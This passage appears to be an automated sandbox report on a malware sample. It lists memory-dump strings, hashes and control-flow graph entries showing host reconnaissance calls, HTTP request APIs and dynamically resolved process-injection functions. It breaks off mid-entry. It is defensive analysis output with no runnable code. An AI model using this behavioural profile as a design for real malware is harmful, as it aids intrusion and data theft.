                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                                                                      • API String ID: 0-3297199963
                                                                                                                                                                                                                      • Opcode ID: 26704386030538610b6ed2dcf422912c5d59c1513264f2dcbb906b660f562b25
                                                                                                                                                                                                                      • Instruction ID: 1e485fe8a0fba1c9c5423b70d09ba87334013c37950e9dfc7242c6bfbabb6d2c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26704386030538610b6ed2dcf422912c5d59c1513264f2dcbb906b660f562b25
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19B174B4E006199FDB55DFA9D590A9EFBF2FF48300F148629E419AB344DB30A945CF90
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2125118731
                                                                                                                                                                                                                      • Opcode ID: c23de5b3bfb7c6fded74f4f9bead373d7a84ec8d5e4cf7b9f995105cf42b833e
                                                                                                                                                                                                                      • Instruction ID: 03644315d72f184df4903a6cfed30553c0a8ddd887cf6181271958376a60a720
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c23de5b3bfb7c6fded74f4f9bead373d7a84ec8d5e4cf7b9f995105cf42b833e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C216EF170031A9BFB34596A8800737BBD65BC0751F24842AD70ECF785DD71D8558361
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2049395529
                                                                                                                                                                                                                      • Opcode ID: 4fac3e11a16a335b4634c88d9743a1fb472752040a1a2a32e1d4ec579f862c83
                                                                                                                                                                                                                      • Instruction ID: aea3928167fc7197e47c0bc9ac7523273145582d441637e82fee04b93e00a870
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fac3e11a16a335b4634c88d9743a1fb472752040a1a2a32e1d4ec579f862c83
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF01DBB170D7958FD72F062C09201656BF25FC2A4072949DBC544DF797CE268C498797

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:2.3%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:5.6%
                                                                                                                                                                                                                      Total number of Nodes:54
                                                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                                                      execution_graph 10681 43e893 10682 43e895 10681->10682 10691 40130b memset memset 10682->10691 10684 43e8b0 10685 4010c6 VirtualAllocExNuma 10684->10685 10686 43e8ba 10685->10686 10687 40168c GetPEB 10686->10687 10688 43e8c4 10687->10688 10689 43d191 OpenEventA 10688->10689 10690 43e8e2 10689->10690 10692 40135d 10691->10692 10693 431442 10694 431454 GetUserNameA 10693->10694 10696 431480 10697 431492 GetComputerNameA 10696->10697 10699 440f40 10700 440f57 LoadLibraryA 10699->10700 10702 441399 10700->10702 10703 401046 VirtualAlloc 10704 401070 10703->10704 10705 43d4eb 10706 43d508 CreateDirectoryA 10705->10706 10708 43d5e4 10706->10708 10715 43c684 10708->10715 10719 43c8ce Sleep 10708->10719 10711 43d686 InternetOpenA 10712 43d6bb 10711->10712 10716 43c6a4 10715->10716 10721 43c1c2 10716->10721 10720 43c8fa InternetOpenA 10719->10720 10720->10711 10722 43c1f0 10721->10722 10731 418160 InternetCloseHandle 10722->10731 10733 417e7d 10722->10733 10736 417f58 10722->10736 10739 417ec8 10722->10739 10742 417d09 10722->10742 10746 417e16 InternetConnectA 10722->10746 10747 418024 InternetReadFile 10722->10747 10732 418116 10731->10732 10734 417ecf HttpOpenRequestA 10733->10734 10737 417f73 HttpSendRequestA 10736->10737 10738 417fa9 10737->10738 10740 417ecf HttpOpenRequestA 10739->10740 10743 417d40 InternetOpenA 10742->10743 10745 417dc4 10743->10745 10748 414de8 10749 414e0f InternetCrackUrlA 10748->10749 10751 414ec1 10749->10751 10752 44163a 10753 44165c LoadLibraryA 10752->10753 10755 442112 LoadLibraryA LoadLibraryA 10753->10755 10756 44217b LoadLibraryA LoadLibraryA 10755->10756 10758 442220 LoadLibraryA 10756->10758 10759 4016ef lstrcmpiW

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 152 431442-43147f GetUserNameA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(00000000), ref: 00431475
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                                                                      • Opcode ID: b3eafffca078be2ca2c018cc31f46bd908eb18f9321fcc2fcf0672908623ba27
                                                                                                                                                                                                                      • Instruction ID: 25aa36c17c4d92c73a0d58bc3163748de46586a953a07f777331ccfe371363d9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3eafffca078be2ca2c018cc31f46bd908eb18f9321fcc2fcf0672908623ba27
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AE086B23011102FD619975DAC81FAB739DDFC8264B0A0035F504C3310E6646C2187BA

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 158 418024-41805c InternetReadFile
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 0041803A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                                                                                                      • Opcode ID: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
                                                                                                                                                                                                                      • Instruction ID: b6fb03e5c75202f5bdf7690399e95dcf118b51c36a476518bdd44740d121225c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDE04F31B1012B9FEB14DB60DC84E5233BABBC8704B108468D105A7115E6B1A907CF91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 44163a-44224d LoadLibraryA * 6
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(0066B8DB), ref: 004420E9
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(0066B8F3), ref: 0044212F
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(0066B8FF), ref: 00442152
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(0066B926), ref: 004421BB
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(0066B931), ref: 004421DE
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00442224
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                      • String ID: CreateProcessA$GetThreadContext$ReadProcessMemory$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                                      • API String ID: 1029625771-2674769033
                                                                                                                                                                                                                      • Opcode ID: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
                                                                                                                                                                                                                      • Instruction ID: fb63d92a9f115e913b2f9b718a076d9a6120d16dab0c00aa961a01dad6639e5b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C729EB4291240EFCB86EF19ED99811B7AAFB8D306316816DD87587374F7B1AC10DB09

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 62 43d4eb-43d5f1 CreateDirectoryA 90 43d5f3 call 43c684 62->90 91 43d5f3 call 43c8ce 62->91 76 43d5f5-43d744 InternetOpenA * 2 90->76 91->76
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0043D5C8
                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 0043D66B
                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 0043D698
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InternetOpen$CreateDirectory
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1348255353-0
                                                                                                                                                                                                                      • Opcode ID: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
                                                                                                                                                                                                                      • Instruction ID: 6651fc40df9015f60e6afa682878b20fc325aeecd42d68c33a1dafcfb698edc4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8711272B002148FCB51DF6CDC91BA9B3F5BF88604F04467DE819D3351EB70AA998B5A

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 92 417e7d-417f47 HttpOpenRequestA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                                                                                                                      • String ID: GET
                                                                                                                                                                                                                      • API String ID: 1984915467-1805413626
                                                                                                                                                                                                                      • Opcode ID: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
                                                                                                                                                                                                                      • Instruction ID: 8e83dcfa2c2d97efb602a18a9ba3dc01c5ea0efa355a390095ddbcd516262747
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6012CB5F15229DFE710DFA8CC80E7B77F9EB48700B154024E910E7321E6B49C018B65

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 95 417ec8-417f47 HttpOpenRequestA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                                                                                                                      • String ID: GET
                                                                                                                                                                                                                      • API String ID: 1984915467-1805413626
                                                                                                                                                                                                                      • Opcode ID: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                                                                      • Instruction ID: 746a938a8d7015067999d655a9801a7b5ec994f78fa219be27d916c50eeeb009
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2401EC75F11129DFE710DFA8DC80E7B77F9EB48710B058124E910E7325E7B598118B65

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 98 440f40-44138d LoadLibraryA 123 441399-4413c0 98->123
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,?,?), ref: 00441370
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                                                      • Opcode ID: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
                                                                                                                                                                                                                      • Instruction ID: 4376c3151c101c1f2856b8dd4cb0e85140bd373f91dae02cc3ec93c000e5ac0a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09C17779606600DFCB04DF6ADC58910B7A6EB883053D5A06DD80A8777EEBF15C93CB0A

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 124 414de8-414ebd InternetCrackUrlA 132 414ec1-414ecb 124->132
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00414EAE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CrackInternet
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1381609488-0
                                                                                                                                                                                                                      • Opcode ID: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
                                                                                                                                                                                                                      • Instruction ID: ad51b445d1971d488cb6eb1a7ddcfcdc88647cb932c96ebc81f61fd4cf75d457
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00212B756002049FDB40CF6ADC84E5A77E4FF48214B058175F808C7322D7B4EE568BAA

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 133 417d09-417dbb InternetOpenA 138 417dc4-417de0 133->138
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
